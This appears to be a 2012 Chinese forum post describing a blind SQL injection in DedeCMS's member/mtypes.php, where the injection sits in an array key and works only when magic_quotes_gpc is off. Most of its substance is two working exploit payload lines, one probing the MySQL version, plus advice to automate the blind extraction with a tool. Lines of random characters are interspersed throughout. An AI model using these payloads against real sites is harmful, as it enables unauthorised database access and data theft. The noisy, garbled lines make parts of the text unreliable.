需要magic_quotes_gpc = Off,所以说是鸡肋啊.
8 b8 b6 @2 P2 A
: E/ e- i* ^4 T( }" }
4 _* [# o3 q G$ z0 h发生在数组key里的注射漏洞,有点意思.
/ Y4 v) n+ m* c0 j 2 A) j3 ^$ w' d7 L5 J
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
: I5 a- E, e2 [, y- \' Y' p2 L
7 ]( |) y" s4 d) V4 a8 ihttp://www.xxx.com /dede/member/mtypes.php?dopost=save
; ~+ P7 c5 Q8 J
( v! T* |) ?! R5 x; eexploit:
& r" j4 ^4 h9 p) X5 Gmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
* q+ a0 G( `( @' x& ]mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
1 h# G2 ?- e( m+ Y# W1 [5 x5 ]3 v |
发表于 2012-12-20 08:08:09
收藏
支持
反对